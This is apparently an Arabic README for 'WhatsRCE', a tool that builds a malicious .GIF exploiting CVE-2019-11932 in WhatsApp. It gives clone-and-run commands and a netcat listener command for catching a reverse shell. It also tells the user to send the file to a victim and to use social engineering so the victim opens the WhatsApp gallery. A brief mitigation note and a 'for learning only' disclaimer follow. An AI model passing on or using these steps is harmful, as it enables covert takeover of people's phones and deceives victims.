WhatsRCE
هذه أداة لتوليد حمولة تلقائية لـ CVE-2019-11932 (تنفيذ الأوامر عن بُعد في واتساب)
- تثبيت GCC تلقائيًا (أمر آمن، يمكنك رؤية أن هذا مفتوح المصدر)
- حفظ إلى ملف .GIF
كيف تستخدم؟
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
كيف تحصل على شيل؟
- فقط أرسل ملف .GIF إلى الضحية كمستند وليس كصورة
- واضبط nc / netcat على المنفذ الذي عيّنته في أداة WhatsRCE {nc -lnvp your_port}
- يمكنك استخدام هجوم الهندسة الاجتماعية لجذب الضحية لتشغيل هذا الاستغلال
- أخبر الضحية بفتح المعرض عبر واتساب واطلب من الضحية إرسال أي صور (لا حاجة، فقط ادخل إلى المعرض لا مشكلة) بعد ذلك بثوانٍ قليلة ستستقبل اتصال شيل من الضحية
أو فقط شاهد هذا
فيديو تجريبي
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view
إذا كان الرابط أعلاه غير قابل للوصول
https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK
كيف تتجنب هذا الهجوم؟
- حدّث واتساب إلى أحدث إصدار (تم تصحيحه في الإصدار 2.19.244)
- كيف تستقبل أي ملف بما في ذلك الصور والصوت وغيرها من أشخاص لا نعرفهم
هذا فقط للتعلم، والعواقب وما إلى ذلك إذا استخدمته في جريمة فأنا لست مسؤولًا!